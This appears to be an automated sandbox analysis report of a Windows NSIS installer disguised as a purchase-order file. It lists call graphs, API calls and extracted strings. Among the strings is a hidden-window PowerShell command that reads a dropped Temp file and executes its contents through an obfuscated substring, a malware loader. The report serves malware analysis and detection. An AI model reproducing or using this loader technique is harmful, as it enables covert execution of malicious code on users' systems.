3069->3066 3070 403171 3069->3070 3155 4060c8 GetModuleHandleA 3070->3155 3073 4060c8 5 API calls 3074 403180 #17 OleInitialize SHGetFileInfoA 3073->3074 3161 405d2f lstrcpynA 3074->3161 3076 4031bd GetCommandLineA 3162 405d2f lstrcpynA 3076->3162 3078 4031cf GetModuleHandleA 3079 4031e6 3078->3079 3080 4057cc CharNextA 3079->3080 3081 4031fa CharNextA 3080->3081 3090 40320a 3081->3090 3082 4032d4 3083 4032e7 GetTempPathA 3082->3083 3163 4030de 3083->3163 3085 4032ff 3087 403303 GetWindowsDirectoryA lstrcatA 3085->3087 3088 403359 DeleteFileA 3085->3088 3086 4057cc CharNextA 3086->3090 3091 4030de 12 API calls 3087->3091 3173 402c66 GetTickCount GetModuleFileNameA 3088->3173 3090->3082 3090->3086 3092 4032d6 3090->3092 3094 40331f 3091->3094 3257 405d2f lstrcpynA 3092->3257 3093 40336d 3101 4057cc CharNextA 3093->3101 3134 4033f3 3093->3134 3147 403403 3093->3147 3094->3088 3096 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3094->3096 3098 4030de 12 API calls 3096->3098 3099 403351 3098->3099 3099->3088 3099->3147 3105 403388 3101->3105 3103 40353b 3107 403543 GetCurrentProcess OpenProcessToken 3103->3107 3108 4035bd ExitProcess 3103->3108 3104 40341d 3267 405525 3104->3267 3112 403433 3105->3112 3113 4033ce 3105->3113 3109 40358e 3107->3109 3110 40355e LookupPrivilegeValueA AdjustTokenPrivileges 3107->3110 3115 4060c8 5 API calls 3109->3115 3110->3109 3271 4054a8 3112->3271 3116 40588f 18 API calls 3113->3116 3118 403595 3115->3118 3119 4033d9 3116->3119 3123 4035aa ExitWindowsEx 3118->3123 3126 4035b6 3118->3126 3119->3147 3258 405d2f lstrcpynA 3119->3258 3121 403454 lstrcatA lstrcmpiA 3125 403470 3121->3125 3121->3147 3122 403449 lstrcatA 3122->3121 3123->3108 3123->3126 3128 403475 3125->3128 3129 40347c 3125->3129 3130 40140b 2 API calls 3126->3130 3127 4033e8 3259 405d2f lstrcpynA 3127->3259 3274 40540e CreateDirectoryA 3128->3274 3279 40548b CreateDirectoryA 3129->3279 3130->3108 3201 4036af 3134->3201 3136 403481 SetCurrentDirectoryA 3137 403490 3136->3137 3138 40349b 3136->3138 3282 405d2f lstrcpynA 3137->3282 3283 405d2f lstrcpynA 3138->3283 3141 405d51 18 API calls 3142 4034da DeleteFileA 3141->3142 3143 4034e7 CopyFileA 3142->3143 3149 4034a9 3142->3149 3143->3149 3144 40352f 3146 405bea 38 API calls 3144->3146 3145 405bea 38 API calls 3145->3149 3146->3147 3260 4035d5 3147->3260 3148 405d51 18 API calls 3148->3149 3149->3141 3149->3144 3149->3145 3149->3148 3150 4054c0 2 API calls 3149->3150 3151 40351b CloseHandle 3149->3151 3150->3149 3151->3149 3153 40607c wsprintfA LoadLibraryExA 3152->3153 3153->3069 3156 4060e4 3155->3156 3157 4060ee GetProcAddress 3155->3157 3158 40605a 3 API calls 3156->3158 3159 403179 3157->3159 3160 4060ea 3158->3160 3159->3073 3160->3157 3160->3159 3161->3076 3162->3078 3164 405f9a 5 API calls 3163->3164 3165 4030ea 3164->3165 3166 4030f4 3165->3166 3167 4057a1 3 API calls 3165->3167 3166->3085 3168 4030fc 3167->3168 3169 40548b 2 API calls 3168->3169 3170 403102 3169->3170 3284 4059d1 3170->3284 3288 4059a2 GetFileAttributesA CreateFileA 3173->3288 3175 402ca6 3193 402cb6 3175->3193 3289 405d2f lstrcpynA 3175->3289 3177 402ccc 3178 4057e8 2 API calls 3177->3178 3179 402cd2 3178->3179 3290 405d2f lstrcpynA 3179->3290 3181 402cdd GetFileSize 3182 402dd9 3181->3182 3195 402cf4 3181->3195 3291 402c02 3182->3291 3184 402de2 3186 402e12 GlobalAlloc 3184->3186 3184->3193 3326 4030c7 SetFilePointer 3184->3326 3302 4030c7 SetFilePointer 3186->3302 3188 402e45 3192 402c02 6 API calls 3188->3192 3190 402dfb 3194 4030b1 ReadFile 3190->3194 3191 402e2d 3303 402e9f 3191->3303 3192->3193 3193->3093 3197 402e06 3194->3197 3195->3182 3195->3188 3195->3193 3198 402c02 6 API calls 3195->3198 3323 4030b1 3195->3323 3197->3186 3197->3193 3198->3195 3199 402e39 3199->3193 3199->3199 3200 402e76 SetFilePointer 3199->3200 3200->3193 3202 4060c8 5 API calls 3201->3202 3203 4036c3 3202->3203 3204 4036c9 3203->3204 3205 4036db 3203->3205 3337 405c8d wsprintfA 3204->3337 3206 405c16 3 API calls 3205->3206 3207 403706 3206->3207 3209 403724 lstrcatA 3207->3209 3211 405c16 3 API calls 3207->3211 3210 4036d9 3209->3210 3328 403974 3210->3328 3211->3209 3214 40588f 18 API calls 3217 403756 3214->3217 3215 4037df 3216 40588f 18 API calls 3215->3216 3218 4037e5 3216->3218 3217->3215 3219 405c16 3 API calls 3217->3219 3221 4037f5 LoadImageA 3218->3221 3222 405d51 18 API calls 3218->3222 3220 403782 3219->3220 3220->3215 3225 40379e lstrlenA 3220->3225 3228 4057cc CharNextA 3220->3228 3223 40389b 3221->3223 3224 40381c RegisterClassA 3221->3224 3222->3221 3227 40140b 2 API calls 3223->3227 3226 403852 SystemParametersInfoA CreateWindowExA 3224->3226 3256 4038a5 3224->3256 3229 4037d2 3225->3229 3230 4037ac lstrcmpiA 3225->3230 3226->3223 3231 4038a1 3227->3231 3232 40379c 3228->3232 3234 4057a1 3 API calls 3229->3234 3230->3229 3233 4037bc GetFileAttributesA 3230->3233 3236 403974 19 API calls 3231->3236 3231->3256 3232->3225 3235 4037c8 3233->3235 3237 4037d8 3234->3237 3235->3229 3238 4057e8 2 API calls 3235->3238 3239 4038b2 3236->3239 3338 405d2f lstrcpynA 3237->3338 3238->3229 3241 403941 3239->3241 3242 4038be ShowWindow 3239->3242 3243 40501a 5 API calls 3241->3243 3244 40605a 3 API calls 3242->3244 3246 403947 3243->3246 3245 4038d6 3244->3245 3247 4038e4 GetClassInfoA 3245->3247 3250 40605a 3 API calls 3245->3250 3248 403963 3246->3248 3249 40394b 3246->3249 3252 4038f8 GetClassInfoA RegisterClassA 3247->3252 3253 40390e DialogBoxParamA 3247->3253 3251 40140b 2 API calls 3248->3251 3255 40140b 2 API calls 3249->3255 3249->3256 3250->3247 3251->3256 3252->3253 3254 40140b 2 API calls 3253->3254 3254->3256 3255->3256 3256->3147 3257->3083 3258->3127 3259->3134 3261 4035ed 3260->3261 3262 4035df CloseHandle 3260->3262 3340 40361a 3261->3340 3262->3261 3265 4055d1 69 API calls 3266 40340c OleUninitialize 3265->3266 3266->3103 3266->3104 3268 40553a 3267->3268 3269 40342b ExitProcess 3268->3269 3270 40554e MessageBoxIndirectA 3268->3270 3270->3269 3272 4060c8 5 API calls 3271->3272 3273 403438 lstrcatA 3272->3273 3273->3121 3273->3122 3275 40347a 3274->3275 3276 40545f GetLastError 3274->3276 3275->3136 3276->3275 3277 40546e SetFileSecurityA 3276->3277 3277->3275 3278 405484 GetLastError 3277->3278 3278->3275 3280 40549b 3279->3280 3281 40549f GetLastError 3279->3281 3280->3136 3281->3280 3282->3138 3283->3149 3285 4059dc GetTickCount GetTempFileNameA 3284->3285 3286 40310d 3285->3286 3287 405a09 3285->3287 3286->3085 3287->3285 3287->3286 3288->3175 3289->3177 3290->3181 3292 402c23 3291->3292 3293 402c0b 3291->3293 3296 402c33 GetTickCount 3292->3296 3297 402c2b 3292->3297 3294 402c14 DestroyWindow 3293->3294 3295 402c1b 3293->3295 3294->3295 3295->3184 3299 402c41 CreateDialogParamA ShowWindow 3296->3299 3300 402c64 3296->3300 3298 406104 2 API calls 3297->3298 3301 402c31 3298->3301 3299->3300 3300->3184 3301->3184 3302->3191 3305 402eb5 3303->3305 3304 402ee3 3307 4030b1 ReadFile 3304->3307 3305->3304 3327 4030c7 SetFilePointer 3305->3327 3308 402eee 3307->3308 3309 402f00 GetTickCount 3308->3309 3310 40304a 3308->3310 3316 403034 3308->3316 3313 402f4f 3309->3313 3309->3316 3311 40308c 3310->3311 3312 40304e 3310->3312 3315 4030b1 ReadFile 3311->3315 3312->3316 3317 4030b1 ReadFile 3312->3317 3318 405a49 WriteFile 3312->3318 3314 4030b1 ReadFile 3313->3314 3313->3316 3319 402fa5 GetTickCount 3313->3319 3320 402fca MulDiv wsprintfA 3313->3320 3322 405a49 WriteFile 3313->3322 3314->3313 3315->3316 3316->3199 3317->3312 3318->3312 3319->3313 3321 404f48 25 API calls 3320->3321 3321->3313 3322->3313 3324 405a1a ReadFile 3323->3324 3325 4030c4 3324->3325 3325->3195 3326->3190 3327->3304 3329 403988 3328->3329 3339 405c8d wsprintfA 3329->3339 3331 4039f9 3332 405d51 18 API calls 3331->3332 3333 403a05 SetWindowTextA 3332->3333 3334 403a21 3333->3334 3335 403734 3333->3335 3334->3335 3336 405d51 18 API calls 3334->3336 3335->3214 3336->3334 3337->3210 3338->3215 3339->3331 3341 403628 3340->3341 3342 4035f2 3341->3342 3343 40362d FreeLibrary GlobalFree 3341->3343 3342->3265 3343->3342 3343->3343 3344 402410 3345 402b44 19 API calls 3344->3345 3346 40241a 3345->3346 3347 402a3a 18 API calls 3346->3347 3348 402423 3347->3348 3349 40242d RegQueryValueExA 3348->3349 3354 4026a6 3348->3354 3350 402453 RegCloseKey 3349->3350 3351 40244d 3349->3351 3350->3354 3351->3350 3355 405c8d wsprintfA 3351->3355 3355->3350 3356 401f90 3357 401fa2 3356->3357 3367 402050 3356->3367 3358 402a3a 18 API calls 3357->3358 3360 401fa9 3358->3360 3359 401423 25 API calls 3362 4021c9 3359->3362 3361 402a3a 18 API calls 3360->3361 3363 401fb2 3361->3363 3364 401fc7 LoadLibraryExA 3363->3364 3365 401fba GetModuleHandleA 3363->3365 3366 401fd7 GetProcAddress 3364->3366 3364->3367 3365->3364 3365->3366 3368 402023 3366->3368 3369 401fe6 3366->3369 3367->3359 3370 404f48 25 API calls 3368->3370 3372 401ff6 3369->3372 3374 401423 3369->3374 3370->3372 3372->3362 3373 402044 FreeLibrary 3372->3373 3373->3362 3375 404f48 25 API calls 3374->3375 3376 401431 3375->3376 3376->3372 3946 401490 3947 404f48 25 API calls 3946->3947 3948 401497 3947->3948 3439 401595 3440 402a3a 18 API calls 3439->3440 3441 40159c SetFileAttributesA 3440->3441 3442 4015ae 3441->3442 3949 402616 3950 40261d 3949->3950 3951 40287c 3949->3951 3952 402a1d 18 API calls 3950->3952 3953 402628 3952->3953 3954 40262f SetFilePointer 3953->3954 3954->3951 3955 40263f 3954->3955 3957 405c8d wsprintfA 3955->3957 3957->3951 3448 401717 3449 402a3a 18 API calls 3448->3449 3450 40171e SearchPathA 3449->3450 3451 401739 3450->3451 3958 402519 3959 40252e 3958->3959 3960 40251e 3958->3960 3961 402a3a 18 API calls 3959->3961 3962 402a1d 18 API calls 3960->3962 3963 402535 lstrlenA 3961->3963 3964 402527 3962->3964 3963->3964 3965 402557 3964->3965 3966 405a49 WriteFile 3964->3966 3966->3965 3967 40149d 3968 4014ab PostQuitMessage 3967->3968 3969 40226e 3967->3969 3968->3969 3970 4046a3 3971 4046b3 3970->3971 3972 4046cf 3970->3972 3981 405509 GetDlgItemTextA 3971->3981 3974 404702 3972->3974 3975 4046d5 SHGetPathFromIDListA 3972->3975 3977 4046e5 3975->3977 3980 4046ec SendMessageA 3975->3980 3976 4046c0 SendMessageA 3976->3972 3979 40140b 2 API calls 3977->3979 3979->3980 3980->3974 3981->3976 3982 401ca7 3983 402a1d 18 API calls 3982->3983 3984 401cae 3983->3984 3985 402a1d 18 API calls 3984->3985 3986 401cb6 GetDlgItem 3985->3986 3987 402513 3986->3987 3988 404028 lstrcpynA lstrlenA 2932 40192a 2933 40192c 2932->2933 2934 402a3a 18 API calls 2933->2934 2935 401931 2934->2935 2938 4055d1 2935->2938 2978 40588f 2938->2978 2941 405610 2944 405748 2941->2944 2992 405d2f lstrcpynA 2941->2992 2942 4055f9 DeleteFileA 2943 40193a 2942->2943 2944->2943 3010 406033 FindFirstFileA 2944->3010 2946 405636 2947 405649 2946->2947 2948 40563c lstrcatA 2946->2948 2993 4057e8 lstrlenA 2947->2993 2950 40564f 2948->2950 2953 40565d lstrcatA 2950->2953 2955 405668 lstrlenA FindFirstFileA 2950->2955 2953->2955 2954 405766 3013 4057a1 lstrlenA CharPrevA 2954->3013 2957 40573e 2955->2957 2976 40568c 2955->2976 2957->2944 2959 4057cc CharNextA 2959->2976 2960 405589 5 API calls 2961 405778 2960->2961 2962 405792 2961->2962 2965 40577c 2961->2965 2966 404f48 25 API calls 2962->2966 2963 40571d FindNextFileA 2967 405735 FindClose 2963->2967 2963->2976 2965->2943 2968 404f48 25 API calls 2965->2968 2966->2943 2967->2957 2969 405789 2968->2969 2970 405bea 38 API calls 2969->2970 2973 405790 2970->2973 2972 4055d1 62 API calls 2972->2976 2973->2943 2974 404f48 25 API calls 2974->2963 2975 404f48 25 API calls 2975->2976 2976->2959 2976->2963 2976->2972 2976->2974 2976->2975 2997 405d2f lstrcpynA 2976->2997 2998 405589 2976->2998 3006 405bea MoveFileExA 2976->3006 3016 405d2f lstrcpynA 2978->3016 2980 4058a0 3017 40583a CharNextA CharNextA 2980->3017 2983 4055f1 2983->2941 2983->2942 2984 405f9a 5 API calls 2990 4058b6 2984->2990 2985 4058e1 lstrlenA 2986 4058ec 2985->2986 2985->2990 2988 4057a1 3 API calls 2986->2988 2987 406033 2 API calls 2987->2990 2989 4058f1 GetFileAttributesA 2988->2989 2989->2983 2990->2983 2990->2985 2990->2987 2991 4057e8 2 API calls 2990->2991 2991->2985 2992->2946 2994 4057f5 2993->2994 2995 405806 2994->2995 2996 4057fa CharPrevA 2994->2996 2995->2950 2996->2994 2996->2995 2997->2976 3023 40597d GetFileAttributesA 2998->3023 3001 4055a4 RemoveDirectoryA 3004 4055b2 3001->3004 3002 4055ac DeleteFileA 3002->3004 3003 4055b6 3003->2976 3004->3003 3005 4055c2 SetFileAttributesA 3004->3005 3005->3003 3007 405c0b 3006->3007 3008 405bfe 3006->3008 3007->2976 3026 405a78 lstrcpyA 3008->3026 3011 405762 3010->3011 3012 406049 FindClose 3010->3012 3011->2943 3011->2954 3012->3011 3014 40576c 3013->3014 3015 4057bb lstrcatA 3013->3015 3014->2960 3015->3014 3016->2980 3018 405855 3017->3018 3021 405865 3017->3021 3019 405860 CharNextA 3018->3019 3018->3021 3022 405885 3019->3022 3020 4057cc CharNextA 3020->3021 3021->3020 3021->3022 3022->2983 3022->2984 3024 405595 3023->3024 3025 40598f SetFileAttributesA 3023->3025 3024->3001 3024->3002 3024->3003 3025->3024 3027 405aa0 3026->3027 3028 405ac6 GetShortPathNameA 3026->3028 3053 4059a2 GetFileAttributesA CreateFileA 3027->3053 3029 405be5 3028->3029 3030 405adb 3028->3030 3029->3007 3030->3029 3032 405ae3 wsprintfA 3030->3032 3034 405d51 18 API calls 3032->3034 3033 405aaa CloseHandle GetShortPathNameA 3033->3029 3035 405abe 3033->3035 3036 405b0b 3034->3036 3035->3028 3035->3029 3054 4059a2 GetFileAttributesA CreateFileA 3036->3054 3038 405b18 3038->3029 3039 405b27 GetFileSize GlobalAlloc 3038->3039 3040 405b49 3039->3040 3041 405bde CloseHandle 3039->3041 3055 405a1a ReadFile 3040->3055 3041->3029 3046 405b68 lstrcpyA 3049 405b8a 3046->3049 3047 405b7c 3048 405907 4 API calls 3047->3048 3048->3049 3050 405bc1 SetFilePointer 3049->3050 3062 405a49 WriteFile 3050->3062 3053->3033 3054->3038 3056 405a38 3055->3056 3056->3041 3057 405907 lstrlenA 3056->3057 3058 405948 lstrlenA 3057->3058 3059 405950 3058->3059 3060 405921 lstrcmpiA 3058->3060 3059->3046 3059->3047 3060->3059 3061 40593f CharNextA 3060->3061 3061->3058 3063 405a67 GlobalFree 3062->3063 3063->3041 3989 4028aa SendMessageA 3990 4028c4 InvalidateRect 3989->3990 3991 4028cf 3989->3991 3990->3991 3418 4015b3 3419 402a3a 18 API calls 3418->3419 3420 4015ba 3419->3420 3421 40583a 4 API calls 3420->3421 3422 4015c2 3421->3422 3423 40161c 3422->3423 3424 4057cc CharNextA 3422->3424 3431 40548b 2 API calls 3422->3431 3432 4054a8 5 API calls 3422->3432 3434 4015eb 3422->3434 3435 401604 GetFileAttributesA 3422->3435 3425 401621 3423->3425 3426 40164a 3423->3426 3424->3422 3427 401423 25 API calls 3425->3427 3429 401423 25 API calls 3426->3429 3428 401628 3427->3428 3438 405d2f lstrcpynA 3428->3438 3436 401642 3429->3436 3431->3422 3432->3422 3433 401633 SetCurrentDirectoryA 3433->3436 3434->3422 3437 40540e 4 API calls 3434->3437 3435->3422 3437->3434 3438->3433 3992 4016b3 3993 402a3a 18 API calls 3992->3993 3994 4016b9 GetFullPathNameA 3993->3994 3995 4016d0 3994->3995 3996 4016f1 3994->3996 3995->3996 3999 406033 2 API calls 3995->3999 3997 401705 GetShortPathNameA 3996->3997 3998 4028cf 3996->3998 3997->3998 4000 4016e1 3999->4000 4000->3996 4002 405d2f lstrcpynA 4000->4002 4002->3996 4003 4014b7 4004 4014bd 4003->4004 4005 401389 2 API calls 4004->4005 4006 4014c5 4005->4006 4007 401d38 GetDC GetDeviceCaps 4008 402a1d 18 API calls 4007->4008 4009 401d56 MulDiv ReleaseDC 4008->4009 4010 402a1d 18 API calls 4009->4010 4011 401d75 4010->4011 4012 405d51 18 API calls 4011->4012 4013 401dae CreateFontIndirectA 4012->4013 4014 402513 4013->4014 4015 404ebc 4016 404ee0 4015->4016 4017 404ecc 4015->4017 4018 404ee8 IsWindowVisible 4016->4018 4026 404eff 4016->4026 4019 404ed2 4017->4019 4020 404f29 4017->4020 4018->4020 4022 404ef5 4018->4022 4021 403f60 SendMessageA 4019->4021 4023 404f2e CallWindowProcA 4020->4023 4024 404edc 4021->4024 4025 404813 5 API calls 4022->4025 4023->4024 4025->4026 4026->4023 4027 404893 4 API calls 4026->4027 4027->4020 4028 40173e 4029 402a3a 18 API calls 4028->4029 4030 401745 4029->4030 4031 4059d1 2 API calls 4030->4031 4032 40174c 4031->4032 4032->4032 4033 401ebe 4034 402a3a 18 API calls 4033->4034 4035 401ec5 4034->4035 4036 406033 2 API calls 4035->4036 4037 401ecb 4036->4037 4039 401edd 4037->4039 4040 405c8d wsprintfA 4037->4040 4040->4039 4041 40193f 4042 402a3a 18 API calls 4041->4042 4043 401946 lstrlenA 4042->4043 4044 402513 4043->4044

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 0040310F Relevance: 94.9, APIs: 33, Strings: 21, Instructions: 357stringcomfileCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 0 40310f-403144 SetErrorMode GetVersion 1 403146-40314e call 4060c8 0->1 2 403157 0->2 1->2 8 403150 1->8 3 40315c-40316f call 40605a lstrlenA 2->3 9 403171-4031e4 call 4060c8 * 2 #17 OleInitialize SHGetFileInfoA call 405d2f GetCommandLineA call 405d2f GetModuleHandleA 3->9 8->2 18 4031f0-403205 call 4057cc CharNextA 9->18 19 4031e6-4031eb 9->19 22 4032ca-4032ce 18->22 19->18 23 4032d4 22->23 24 40320a-40320d 22->24 27 4032e7-403301 GetTempPathA call 4030de 23->27 25 403215-40321d 24->25 26 40320f-403213 24->26 28 403225-403228 25->28 29 40321f-403220 25->29 26->25 26->26 37 403303-403321 GetWindowsDirectoryA lstrcatA call 4030de 27->37 38 403359-403373 DeleteFileA call 402c66 27->38 31 4032ba-4032c7 call 4057cc 28->31 32 40322e-403232 28->32 29->28 31->22 47 4032c9 31->47 35 403234-40323a 32->35 36 40324a-403277 32->36 41 403240 35->41 42 40323c-40323e 35->42 43 403279-40327f 36->43 44 40328a-4032b8 36->44 37->38 55 403323-403353 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030de 37->55 52 403407-403417 call 4035d5 OleUninitialize 38->52 53 403379-40337f 38->53 41->36 42->36 42->41 49 403281-403283 43->49 50 403285 43->50 44->31 46 4032d6-4032e2 call 405d2f 44->46 46->27 47->22 49->44 49->50 50->44 66 40353b-403541 52->66 67 40341d-40342d call 405525 ExitProcess 52->67 56 403381-40338c call 4057cc 53->56 57 4033f7-4033fe call 4036af 53->57 55->38 55->52 68 4033c2-4033cc 56->68 69 40338e-4033b7 56->69 64 403403 57->64 64->52 71 403543-40355c GetCurrentProcess OpenProcessToken 66->71 72 4035bd-4035c5 66->72 78 403433-403447 call 4054a8 lstrcatA 68->78 79 4033ce-4033db call 40588f 68->79 75 4033b9-4033bb 69->75 73 40358e-40359c call 4060c8 71->73 74 40355e-403588 LookupPrivilegeValueA AdjustTokenPrivileges 71->74 76 4035c7 72->76 77 4035cb-4035cf ExitProcess 72->77 90 4035aa-4035b4 ExitWindowsEx 73->90 91 40359e-4035a8 73->91 74->73 75->68 82 4033bd-4033c0 75->82 76->77 88 403454-40346e lstrcatA lstrcmpiA 78->88 89 403449-40344f lstrcatA 78->89 79->52 92 4033dd-4033f3 call 405d2f * 2 79->92 82->68 82->75 88->52 94 403470-403473 88->94 89->88 90->72 95 4035b6-4035b8 call 40140b 90->95 91->90 91->95 92->57 97 403475-40347a call 40540e 94->97 98 40347c call 40548b 94->98 95->72 106 403481-40348e SetCurrentDirectoryA 97->106 98->106 107 403490-403496 call 405d2f 106->107 108 40349b-4034c3 call 405d2f 106->108 107->108 112 4034c9-4034e5 call 405d51 DeleteFileA 108->112 115 403526-40352d 112->115 116 4034e7-4034f7 CopyFileA 112->116 115->112 118 40352f-403536 call 405bea 115->118 116->115 117 4034f9-403519 call 405bea call 405d51 call 4054c0 116->117 117->115 127 40351b-403522 CloseHandle 117->127 118->52 127->115
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 00403134
                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 0040313A
                                                                                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
                                                                                                                                                                                                          • #17.COMCTL32(00000007,00000009), ref: 00403185
                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040318C
                                                                                                                                                                                                          • SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
                                                                                                                                                                                                          • GetCommandLineA.KERNEL32(Snik Setup,NSIS Error), ref: 004031BD
                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\rPO3799039985.exe",00000000), ref: 004031D0
                                                                                                                                                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\rPO3799039985.exe",00000020), ref: 004031FB
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
                                                                                                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
                                                                                                                                                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
                                                                                                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
                                                                                                                                                                                                          • DeleteFileA.KERNELBASE(1033), ref: 0040335E
                                                                                                                                                                                                            • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                                                                                                                            • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                                                                                                                          • OleUninitialize.OLE32(?), ref: 0040340C
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040342D
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403551
                                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004035CF
                                                                                                                                                                                                            • Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                                                                                                                          • String ID: "$"C:\Users\user\Desktop\rPO3799039985.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen$C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen$C:\Users\user\Desktop$C:\Users\user\Desktop\rPO3799039985.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Snik Setup$TEMP$TMP$UXTHEME$\Temp$`Ku$powershell.exe -windowstyle hidden "$Polysaccum=Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\Martyrization.Pra121';$Sikkerhedsforvaringernes=$Polysaccum.SubString(72097,3);.$Sikkerhedsforvaringernes($Polysaccum)$~nsu
                                                                                                                                                                                                          • API String ID: 3329125770-2336724476
                                                                                                                                                                                                          • Opcode ID: 58f8fa9e57e5906b6f3c86c07771158f2cbcd973fc4b84140ca79d5348ef2a4e
                                                                                                                                                                                                          • Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58f8fa9e57e5906b6f3c86c07771158f2cbcd973fc4b84140ca79d5348ef2a4e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E
                                                                                                                                                                                                          Function 00405086 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 128 405086-4050a2 129 405231-405237 128->129 130 4050a8-40516f GetDlgItem * 3 call 403f49 call 4047e6 GetClientRect GetSystemMetrics SendMessageA * 2 128->130 132 405261-40526d 129->132 133 405239-40525b GetDlgItem CreateThread CloseHandle 129->133 153 405171-40518b SendMessageA * 2 130->153 154 40518d-405190 130->154 135 40528f-405295 132->135 136 40526f-405275 132->136 133->132 139 405297-40529d 135->139 140 4052ea-4052ed 135->140 137 4052b0-4052b7 call 403f7b 136->137 138 405277-40528a ShowWindow * 2 call 403f49 136->138 150 4052bc-4052c0 137->150 138->135 143 4052c3-4052d3 ShowWindow 139->143 144 40529f-4052ab call 403eed 139->144 140->137 147 4052ef-4052f5 140->147 151 4052e3-4052e5 call 403eed 143->151 152 4052d5-4052de call 404f48 143->152 144->137 147->137 148 4052f7-40530a SendMessageA 147->148 155 405310-40533c CreatePopupMenu call 405d51 AppendMenuA 148->155 156 405407-405409 148->156 151->140 152->151 153->154 157 4051a0-4051b7 call 403f14 154->157 158 405192-40519e SendMessageA 154->158 165 405351-405367 TrackPopupMenu 155->165 166 40533e-40534e GetWindowRect 155->166 156->150 167 4051b9-4051cd ShowWindow 157->167 168 4051ed-40520e GetDlgItem SendMessageA 157->168 158->157 165->156 169 40536d-405387 165->169 166->165 170 4051dc 167->170 171 4051cf-4051da ShowWindow 167->171 168->156 172 405214-40522c SendMessageA * 2 168->172 173 40538c-4053a7 SendMessageA 169->173 174 